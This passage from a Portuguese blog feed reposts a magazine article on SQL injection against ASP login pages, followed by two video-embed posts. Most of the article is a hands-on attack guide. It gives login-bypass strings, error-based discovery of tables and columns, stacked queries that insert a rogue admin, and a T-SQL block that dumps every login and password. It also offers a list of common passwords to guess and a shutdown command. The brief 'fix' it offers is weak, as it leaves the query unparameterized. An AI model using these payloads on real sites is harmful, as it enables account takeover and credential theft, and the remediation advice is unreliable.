sites que testam a entrada do login em scripts ASP com chamadas internas de SQL.&lt;br /&gt;&lt;br /&gt;Vamos a lógica:&lt;br /&gt;&lt;br /&gt;O programador, iniciante ou não, pensa em criar uma área restrita para o site, logo precisará de um login e senha para os usuários. Então é criado dentro do banco de dados (em sql ou mdb, mais comum em mdb) uma tabela chamada Users, com alguns campos, dentre eles Usuário, Senha, Nome e Admin. Esses campos informarão exatamente o que o nome diz, ou seja, o login do usuário, a sua respectiva senha, seu nome e um campo flag indicando se é admin do site ou não. Se for admin, geralmente tem acessos a cliques extras, do tipo incluir/editar/deletar alguma informação.&lt;br /&gt;&lt;br /&gt;Feito isso, cria dentro da sua página um bloco onde pede o login e senha para o usuário ter acesso as devidas áreas. Geralmente, o formulário tem apenas os dois campos mesmo, user e senha. Esses dois campos são enviados para um script .asp, que validará ou não o login informado. Se for válido, redireciona para a área restrita, senão, volta ao login ou no máximo, informa que o login estava errado.&lt;br /&gt;&lt;br /&gt;Bonito não!? Teoricamente funciona.&lt;br /&gt;&lt;br /&gt;Vamos a prática:&lt;br /&gt;&lt;br /&gt;Dentro desse script .asp, o programador colocou algo desse tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    ‘ Isso pega o usuário e senha informados no formulário&lt;br /&gt;    cUser = trim(request(usuario))&lt;br /&gt;    cSenha = trim(request(senha))&lt;br /&gt;&lt;br /&gt;    ‘Isso verifica no banco de dados se o usuário e senha conferem&lt;br /&gt;    ‘ (vamos supor que o banco já esteja aberto com o nome de objConn)&lt;br /&gt;    SQLOpen = select usuario, senha, nome, admin from Users where usuario=’ &amp; cUser &amp; ‘ and senha=’ &amp; cSenha &amp; ‘&lt;br /&gt;    objRS.Open SQLOpen, objConn&lt;br /&gt;&lt;br /&gt;    ‘ Verifica se achou um usuário com o login e senha informados&lt;br /&gt;&lt;br /&gt;    if not objRS.bof then&lt;br /&gt;         response.write Bem vindo &amp; objRS.fields(nome) &amp; !&lt;br /&gt;    else&lt;br /&gt;         response.write Login inválido.&lt;br /&gt;    end if&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Na prática inocente, isso funciona. Funciona muito bem. Testa os usuários, se a senha não for a correta, realmente não entra. Se um usuário foi digitado errado, também não dá acesso.&lt;br /&gt;&lt;br /&gt;Mas, na prática hacker, isso funciona melhor ainda, pois permite entrarmos como qualquer usuário do sistema. Até mesmo com status de admin.&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= ' cUser ' and senha= ' cSenha ';&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Essa é a string do SQL. Em VB e ASP, sabemos que para concatenarmos uma string dentro de outra, devemos usar aspa simples, invés de aspa dupla, pois a aspa dupla é para a string mestra, e a aspa simples é para a string interna.&lt;br /&gt;&lt;br /&gt;Traduzindo a string acima, teríamos:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= 'geek' and senha= 's3nh4'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dessa forma, trocamos as variáveis cUser e cSenha, pelos seus respectivos conteúdos.&lt;br /&gt;&lt;br /&gt;Repito, isso funciona muito bem, quando usamos de forma inocente. Vale lembrar que de 10 sites em asp que pedem login e senha, 8 tem essa forma de consulta e estão sujeitos a algum tipo de invasão, dependendo do nível de acesso que permita aos seus usuários.&lt;br /&gt;&lt;br /&gt;Você falou, falou, falou…. mas e daí!? Cadê o erro nisso?&lt;br /&gt;&lt;br /&gt;Ok. Vamos ao erro:&lt;br /&gt;&lt;br /&gt;Se quando formos digitar um login, tivermos essa string de programação do Sql na cabeça, podemos formar outra facilmente, que injeta um comando de Sql, dentro do que o programador já fez.&lt;br /&gt;&lt;br /&gt;Ou seja, se eu digitar Mario no username, o Sql ficará:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= 'Mario' and senha= 's3nh4'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Repare que as aspas simples continuam e fazem realmente parte do comando, que mostra ao sql que aquele campo deve ser comparado com um dado do tipo string.&lt;br /&gt;&lt;br /&gt;Agora, se digitarmos no username Ma'rio (com uma aspa simples no meio), a página dará um erro, pois o comando ficaria desse tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= 'Ma'rio' and senha= 's3nh4'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Analisando, vemos que quando fomos comparar o campo usuário, abrimos uma aspa simples, colocamos o conteúdo Ma (Mario) e fechamos a aspa simples. Para o Sql, a comparação terminou aí, o que vem depois, deveria ser comandos. Mas não era. Era a continuação do username, a palavra rio e mais uma aspa simples, que deveria estar fechando a primeira (antes da palavra Ma), mas na realidade está abrindo uma nova string no SQL, e como não é comparado com nada, o SQL retorna erro de programação.&lt;br /&gt;&lt;br /&gt;Então, já que o SQL aguarda ansiosamente por outra aspa simples para fechar aquela primeira, porque nós não damos a ele, e aproveitando, injetamos um comando nele.&lt;br /&gt;&lt;br /&gt;Imagine se usarmos a string ' or '1 (isso mesmo: aspa simples + espaco + or + espaco + aspa simples + 1), ficaria assim:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= '' or '1' and senha= 's3nh4'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Lendo o comando, seria a mesma coisa que falar pro SQL: me retorne o usuário que seja igual a vazio OU 1. Lembrando que 1 em informática é a mesma coisa que True (verdadeiro). Lendo novamente: Me retorne o usuário que seja igual a vazio (não existe nenhum) OU verdadeiro (opa.. verdadeiro é verdadeiro, então achei). Nisso, a tabela pega todos os usuários, pois todos dão verdadeiro. Não são igual a vazio, mas o 1 garante que todos sejam válidos. Agora falta só filtrar a senha.&lt;br /&gt;&lt;br /&gt;Se usarmos a mesma string mágica na senha, nós seremos o primeiro usuário da tabela, pois:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    select usuario, senha, nome, admin from Users where usuario= ''or '1' and senha= '' or '1'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Me retorne o usuário que seja igual a vazio (nenhum) OU verdadeiro (todos) E que tenha a senha igual a vazio (nenhum) OU verdadeiro (todos).&lt;br /&gt;&lt;br /&gt;Isso traz todos os usuários da tabela, porém com o ponteiro no primeiro usuário.&lt;br /&gt;&lt;br /&gt;Quando fazemos uma tabela de usuários, e colocamos no ar, qual o primeiro usuário que incluímos? Nós mesmos, claro. E com nível de administrador. E é exatamente esse que viramos quando usamos essa falha.&lt;br /&gt;&lt;br /&gt;Alguns outros casos, são quando queremos entrar com o username de uma determinada pessoa. No username, colocamos o nome dela corretamente, e na senha, como não sabemos, usamos essa string que nos foi enviada por Alah. O SQL, muito esperto, entende que é pra retornar o usuário com o nome informado e que tenha uma senha igual a vazio OU verdadeiro. Ou seja, na verdade, ele irá ignorar a senha, e apontará para o registro que o username seja igual ao que foi informando no campo do formulário.&lt;br /&gt;&lt;br /&gt;Outro ponto, é quando não sabemos o nome do usuário, e o site tem muitos cadastros. Então, entramos como qualquer um, e com seus respectivos direitos. No usuário colocamos a string mágica, e na senha chutamos qualquer coisa, por exemplo, 123456 (num site com mais de 200 cadastros, é 99% de certeza que alguém tenha usado essa senha.). Então, o SQL apontará o registro para o primeiro usuário que tenha essa senha no seu cadastro. Outras senhas usadas são: 123123, 123321, 121212, 111222, (o próprio nome do site), abc, abcd, abcdef, abc123, 123abc, e coisas fáceis desse tipo.&lt;br /&gt;&lt;br /&gt;E no caso do login pedido ser um e-mail, essa string não funcionará, pois talvez exista uma validação no campo do login para atestar que o que foi digitado tem um formato de e-mail (digo talvez, pois já vi sites pedindo e-mail login mas que não validavam nada…)&lt;br /&gt;&lt;br /&gt;Daí, usamos a string que passa por essas validações (como o campo de e-mail é grande, por não se saber qual o mail do usuário, podemos utilizar essa string maior. A string anterior é pequena para caber em qualquer campo de login e senha).&lt;br /&gt;&lt;br /&gt;A string que passa pelos e-mails é:&lt;br /&gt;eu@eu.com'or'.11'='.11&lt;br /&gt;Dessa forma, caso verifiquem se existe @, esta string passará pois tem 1 @ só.&lt;br /&gt;Se verificarem se tem alguma coisa antes da @… ela é válida e também passa.&lt;br /&gt;Se verificarem de trás pra frente na string.. procurando por uma TLD válida (com um ponto na terceira ou quarta casa, de trás pra frente), encontrarão o ponto (.) na terceira casa, que significa uma TLD brasileira (.br) ou de outros países. E se ainda verificarem mais pra trás, por domínios, encontrarão outros 2 pontos, o que torna esse e-mail pertencente a um domínio com subdomínio.&lt;br /&gt;&lt;br /&gt;Ok. Sou dono de um site em asp, e uso essa forma de verificação. Agora que você já me ferrou e que todo mundo vai me invadir, pode me dizer como conserto isso?&lt;br /&gt;&lt;br /&gt;Claro. É pra isso mesmo que eu estou falando desse erro. Para alertar os sites que estejam com esse problema. Vamos a correção:&lt;br /&gt;&lt;br /&gt;O problema todo é que o script só verifica se achou ou não um usuário, não faz um check-up para atestar a veracidade do que foi encontrado. Então, bastaria adicionar o seguinte comando dentro daquele script:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    ‘ Isso pega o usuário e senha informados no formulário&lt;br /&gt;    cUser = trim(request(usuario))&lt;br /&gt;    cSenha = trim(request(senha))&lt;br /&gt;&lt;br /&gt;    ‘Isso verifica no banco de dados se o usuário e senha conferem&lt;br /&gt;    ‘ (vamos supor que o banco já esteja aberto com o nome de objConn)&lt;br /&gt;&lt;br /&gt;    SQLOpen = select usuario, senha, nome, admin from Users where usuario= ' cUser ' and senha= ' cSenha '&lt;br /&gt;&lt;br /&gt;    objRS.Open SQLOpen, objConn&lt;br /&gt;&lt;br /&gt;    ‘ Verifica se achou um usuário com o login e senha informados&lt;br /&gt;&lt;br /&gt;    if not objRS.bof then&lt;br /&gt;&lt;br /&gt;    if objRS.fields(usuario) = cUsuario and objRS.fields(senha) = cSenha then&lt;br /&gt;         response.write Bem vindo &amp; objRS.fields(nome) &amp; !&lt;br /&gt;    else&lt;br /&gt;        response.write Login inválido.&lt;br /&gt;    end if&lt;br /&gt;&lt;br /&gt;    else&lt;br /&gt;         response.write Login inválido.&lt;br /&gt;    end if&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dessa forma não há furos de aspa simples ou aspa dupla, pois o IF não se confunde com isso.&lt;br /&gt;&lt;br /&gt;Outra forma também, seria tratar o caractere da aspa simples dentro dos campos de usuario e senha, não deixando ele estar contido nesses campos. Mas é um pouco mais trabalhoso.&lt;br /&gt;&lt;br /&gt;Outra coisa que é bom lembrar, é que esse erro não afeta somente a internet. Sistemas feitos em Delphi e Visual Basic com esse tipo de verificação de usuário também estão passíveis a esse erro. Portanto, verifique-os também.&lt;br /&gt;&lt;br /&gt;Modo Avançado: buscando e alterando dados.&lt;br /&gt;&lt;br /&gt;Agora que você já sabe como entrar em um site restrito, que peça login e senha, feito em asp com sql, vamos aprender agora como ver dados das tabelas, modificar ou até mesmo apagar todo o banco de dados.&lt;br /&gt;&lt;br /&gt;Aqui são usados conhecimentos avançados de programação em SQL e, se você não conhece SQL (a linguagem), então essa matéria não vai adiantar muita coisa pra você. Recomendo que caso queira se tornar um perito em invasão de banco de dados, vá aprender SQL primeiro. ;)&lt;br /&gt;&lt;br /&gt;Nem só de campos de formulários vive um site. O site também pode passar informações pela linha de endereços. Se você não consegue fazer alguma coisa pelos próprios campos (aqui também usaremos o campo de usuário de um login para fazer as ações), então abra o código fonte da página (aquele com o clique do botão direito do mouse, exibir código fonte), e procure pela linha do Form Action. O que vem depois do Action é a url ou página a ser chamada pelo formulário. Depois, procure nas tags de inputs o campo de entrada do usuário, geralmente denominado name=usuario ou name=user. Feito isso, já temos a nossa ação pela linha de comando, livre das travas impostas pelo formulário, tais como o limite de caracteres ou alguma validação de campo feito em javascript. Dessa forma, invés de preencher o campo usuário no form, você colocaria no endereço uma url desse tipo:&lt;br /&gt;http://www.siteemasp.tld/arquivo.asp?user=comandos em sql&lt;br /&gt;&lt;br /&gt;Não se preocupe com os espaços na URL, pois o Internet Explorer é bonzinho e se encarrega de trocar pelos devidos códigos de espaço (%20)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vamos falar um pouco de teoria&lt;br /&gt;&lt;br /&gt;No SQL, o comando de banco de dados é simplesmente uma string com um texto dentro. Esse texto, formado de comandos pré-estipulados, é interpretado pelo SQL e retorna o que foi pedido. Além dos comandos, existe também uma definição de Comentário dentro do SQl, que pra muita gente é algo desconhecido. Da mesma forma que você pode comentar o seu script ou programa, incluindo linhas que dizem pra que serve cada bloco, o SQL também permite, dentro dessa string, um comentário que facilitará o entendimento daquela string quando for lida por outra pessoa. Apesar de quase nunca ser usada na prática, esse caractere de comentário terá uma função extremamente valiosa para nós. Outro caractere que será muito usado e venerado aqui, é o caractere de “faz mais alguma coisa”, que além de executar o primeiro comando, manda executar um segundo comando dentro daquele primeiro. Entenderão o que eu estou dizendo mais na frente.&lt;br /&gt;&lt;br /&gt;Só pra ilustrar, o caractere de comentário são dois sinais de menos “–“ e o caractere de nova execução é o ponto-e-vírgula “;”. O caractere asterisco “*” significa todos os campos da tabela.&lt;br /&gt;&lt;br /&gt;Finalmente, vamos a prática…&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Seria interessante que ao mesmo tempo em que você for lendo, ir também testando em algum site o que será dito adiante. É mais prudente montar um site em asp, com um acesso ao banco de dados em SQL Server próprio, para testar. É sempre válido lembrar que esta matéria é apenas para fins educacionais. J&lt;br /&gt;&lt;br /&gt;Você está num site em asp, com acesso por SQL, que usa um campo de login e senha vistos por uma sql desse tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    SQL = “Select * from usuarios where username=’” &amp; user &amp; “’ and pass=’” &amp; pass &amp; “’”&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A sql é desse tipo, mas você como usuário normal do site não conseguiria saber disso.&lt;br /&gt;&lt;br /&gt;No campo de usuário, se você colocar o conteúdo:&lt;br /&gt;Usuário: admin’ –&lt;br /&gt;Senha: xyz&lt;br /&gt;&lt;br /&gt;O que irá acontecer é que você irá entrar no site como se fosse o admin (levando em consideração que admin é o usuário real cadastrado no banco de dados como sendo o admin), mesmo sem saber a senha do admin, pois a senha agora será ignorada.&lt;br /&gt;&lt;br /&gt;O caractere - - no final do campo especifica pro sql que daquele ponto em diante tudo é comentário, e a string do SQL final ficaria desse tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    SQL = “Select * from usuarios where username=’admin’ — ‘ and senha=’xyz’ “&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ou seja, a verificação “ ‘ and senha=…” virou um simples comentário dentro daquela string e não será processada pelo interpretador do sql. Dessa forma, você entrar simplesmente designando o username.&lt;br /&gt;&lt;br /&gt;Creio que agora está entendido o uso do caractere de comentário. Vamos seguir em frente.&lt;br /&gt;&lt;br /&gt;Caso você não saiba o nome de algum campo da tabela, ou até mesmo não saiba o nome de alguma tabela, podemos usar as mensagens de erro do SQL para poder conhecer mais sobre as tabelas do site. Façamos da seguinte forma no campo de usuário:&lt;br /&gt;&lt;br /&gt;Usuário: ’ having 1=1 –&lt;br /&gt;Senha: xyz&lt;br /&gt;&lt;br /&gt;O erro dado será parecido com o abaixo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘usuarios.CODIGO’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Agora, você jí sabe o nome da tabela (usuarios) e o nome do primeiro campo (código) da consulta na tabela. Como foi usado *, este campo é o primeiro a ser retornado.&lt;br /&gt;&lt;br /&gt;Se fosse usada uma string do tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    SQL = “select nome, login, senha, nivel, cpf from usuarios where ….”&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;O que ia ser retornado é usuarios.NOME, pois é o primeiro campo da pesquisa.&lt;br /&gt;&lt;br /&gt;Se você agora montar uma outra string dentro do campo nome, irí saber o próximo campo da tabela:&lt;br /&gt;&lt;br /&gt;Usuírio: ’ group by usuarios.codigo having 1=1 –&lt;br /&gt;Senha: xyz&lt;br /&gt;&lt;br /&gt;Isso irí produzir o seguinte erro:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘usuarios.login’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Você agora pode ir gerando erros assim até saber todos os campos que serão retornados da string SQL. Basta para isso dividir os campos com vírgula, assim:&lt;br /&gt;&lt;br /&gt;Usuário: ’ group by usuarios.codigo, usuarios.login having 1=1 –&lt;br /&gt;&lt;br /&gt;Quando você não obter mais nenhuma mensagem de erro, significa que todos os campos já estão validados e constam na string. Nesse ponto, você já saberá todos os campos e a ordem que eles virão.&lt;br /&gt;&lt;br /&gt;Agora é interessante saber o tipo de cada campo e, para isso, vamos obrigar o sql a gerar um novo erro:&lt;br /&gt;&lt;br /&gt;Usuário: ’ union select sum(login) from usuarios –&lt;br /&gt;&lt;br /&gt;O erro aparece como:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Isso informa que o campo login é do tipo varchar. Mas se por acaso a mensagem de erro vier da forma a seguir, é porque o campo em questão é do tipo numérico.&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Agora que você já sabe o nome da tabela, os nomes dos campos e seus respectivos tipos, vamos ao próximo passo, que é usar o caractere de “faz mais alguma coisa”, o excelentíssimo ponto-e-vírgula.&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Usuírio: ’ ; insert into usuarios (nome, login, senha, nivel, cpf ) values ( “Geek”, “haxo”, “p4ss”, 1, “12345678900”) –&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Preciso explicar!? J Bem, isso faz uma inclusão na tabela usuários de um registro, o qual tem o username sendo haxo e a senha p4ss, o que permitiria a você ser um novo usuário do site, dessa vez devidamente registrado.&lt;br /&gt;&lt;br /&gt;Obviamente, isso não se restringe a tabelas de usuários. Serve para qualquer tabela no site, como matérias, enquetes, colunas e até mesmo alguma tabela que guarde dados financeiros como cartões de crédito ou outras coisas.&lt;br /&gt;&lt;br /&gt;Uma técnica boa para descobrir o conteúdo dos campos é atribuindo um campo texto a um campo numérico. Por exemplo, vamos supor que o site em um determinado momento, se referencie a uma matéria dentro dele por um código numérico, do tipo idm=432. Daà, podemos descobrir um usuário fazendo o seguinte esquema na URL:&lt;br /&gt;&lt;br /&gt;http://www.siteemasp.tld/pagina.asp?idm=(select min(login) from usuarios) –&lt;br /&gt;&lt;br /&gt;O erro retornado será assim:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘anderson’ to a column of data type int.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ou seja, sabemos que o menor login (na ordem alfabética) é Anderson. Isso acontece dessa forma direta, pois dentro do SQL a comparação de números não pode ter aspas simples, e o campo pode ser comparado com uma nova string sql, desde que entre parênteses.&lt;br /&gt;&lt;br /&gt;Agora, podemos também descobrir sua senha, dessa forma:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    www.siteemasp.tld/pagina.asp?idm=(select senha from usuarios where login=’anderson’) –&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘14quatorze’ to a column of data type int.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Agora sabemos um usuário e uma senha real do site. Claro que se a senha do Anderson fosse numérica, o que aconteceria era aparecer uma matéria qualquer, mas bastaria pegar o ID da matéria, em algum lugar do código fonte, ou até mesmo na barra de endereços (caso ela mudasse), e saberemos a senha dele, do mesmo jeito.&lt;br /&gt;&lt;br /&gt;Uma outra situação, porém bem mais complexa e avançada, é a criação de SQL Transactions, que nada mais é do que um pequeno script que roda dentro do SQL e retorna uma resposta programada.&lt;br /&gt;&lt;br /&gt;A seguinte linha, manda que seja criada uma Transact SQL concatenando todos os usuários e senha da tabela, e retornando em uma mensagem.&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Usuário: ‘; begin declare @ret varchar(8000) set @ret=’:’ select @ret=@ret+’ ‘+login+’/’+senha from usuarios where login&gt;@ret select @ret as ret into alluser end –&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Depois de enviado, isso cria uma tabela chamada alluser com um campo nomeado como ret, que contem um único registro com todos os logins e senhas concatenados.&lt;br /&gt;&lt;br /&gt;Para ver o resultado disso, basta executar a url de matérias, dessa vez selecionando esse campo da nova tabela:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    www.siteemasp.tld/pagina.asp?idm=(select ret from alluser) –&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;O retorno será alguma coisa desse tipo:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′&lt;br /&gt;    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ‘: atadmin/umasenha user3/abcd anderson/14quatorze’ to a column of data type int.&lt;br /&gt;    /arquivo.asp, line 94&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Depois de ver os dados da nova tabela, apague-a:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Usuário: ‘; drop table alluser –&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Captaram a mensagem? Isto é quase tudo que se pode fazer com o SQL Server, quando mau programado dentro de uma ASP. Existem pessoas que acham que simplesmente limitando o tamanho de um campo dentro do formulário, já estão se prevenindo de selects e outros comandos mais. Imaginemos um campo de usuário limitado em 12 caracteres:&lt;br /&gt;&lt;br /&gt;Código: Selecionar tudo&lt;br /&gt;    Usuário: ‘;shutdown–&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Existe ainda formas de, por comandos em SQL, executar comandos arbitrários dentro do server que roda o sql server. Você por exemplo, poderia obter o dir de um c: ou até mesmo criar e apagar arquivos dentro da máquina. Mas isso, é um outro assunto. Por hora, tá bom.&lt;br /&gt;&lt;br /&gt;Vale lembrar que todas essas situações descritas aqui funcionam em sites com SQL Server. Sites que tem um MDB como banco de dados, os selects funcionarão, mas coisas como SQL Transact e alguns outros comandos peculiares ao SQL Server não irão funcionar.&lt;br /&gt;&lt;br /&gt;Você é programador de um site (ou vários) em asp e está perplexo com tudo isso, pois todos os sites que você fez estão vulneráveis a esse erro, e você precisa de uma solução rápida para consertar todos eles? Infelizmente, não existe. Você vai ter que verificar o conteúdo de cada variável, dentro da própria asp, antes de coloca-la dentro de um comando sql. Difícil e penoso? Pois é… quem mandou escolher essa profissão…&lt;br /&gt;&lt;br /&gt;Escrito Por: Marcelo R. Gomes&lt;br /&gt;Publicado: Nas edições da H4CK3R #3 e #4, da Editora Digerati.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-1900160177233472109?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/1900160177233472109/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/invasao-de-bancos-sql.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/1900160177233472109'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/1900160177233472109'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/invasao-de-bancos-sql.html' title='Invasão de Bancos SQL'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-8193405701893967190</id><published>2009-05-19T17:56:00.000-07:00</published><updated>2009-05-19T18:00:37.174-07:00</updated><title type='text'>Veja Mundo S/A -Super Computadores</title><content type='html'>&lt;object width="480" height="392"&gt;&lt;param value="http://video.globo.com/Portal/videos/cda/player/player.swf" name="movie"&gt;&lt;param value="high" name="quality"&gt;&lt;param value="midiaId=979545&amp;amp;autoStart=false&amp;amp;width=480&amp;amp;height=392" name="FlashVars"&gt;&lt;embed flashvars="midiaId=979545&amp;amp;autoStart=false&amp;amp;width=480&amp;amp;height=392" type="application/x-shockwave-flash" quality="high" src="http://video.globo.com/Portal/videos/cda/player/player.swf" width="480" height="392"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-8193405701893967190?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/8193405701893967190/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/veja-mundo-sa-super-computadores.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/8193405701893967190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5036822421883770705/posts/default/8193405701893967190'/><link rel='alternate' type='text/html' href='http://hackeregamer.blogspot.com/2009/05/veja-mundo-sa-super-computadores.html' title='Veja Mundo S/A -Super Computadores'/><author><name>Tonny André</name><uri>http://www.blogger.com/profile/12672776308653499902</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5036822421883770705.post-7160373323451787450</id><published>2009-05-07T07:38:00.000-07:00</published><updated>2009-05-07T07:39:37.111-07:00</updated><title type='text'>NOVO WINDOS 7 MAIS SEGURO QUE O VISTA</title><content type='html'>&lt;object width="320" height="225"&gt;&lt;param name="movie" value="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM198/pgm198_cv_winseven.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=baixa&amp;titulo_video=Testamos o Windows 7 - Parte 2&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=7259?id_conteudo=7259"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.olhardigital.com.br/flashes/player_embed_low?path_video=http://p.download.uol.com.br/olhardigital/PGM198/pgm198_cv_winseven.flv&amp;player_width=640&amp;player_height=380&amp;tipo_player=baixa&amp;titulo_video=Testamos o Windows 7 - Parte 2&amp;current_url=http://olhardigital.uol.com.br/central_de_videos/video_wide.php?id_conteudo=7259?id_conteudo=7259" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="225"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5036822421883770705-7160373323451787450?l=hackeregamer.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackeregamer.blogspot.com/feeds/7160373323451787450/comments/default' title='Postar comentários'/><link rel='replies' 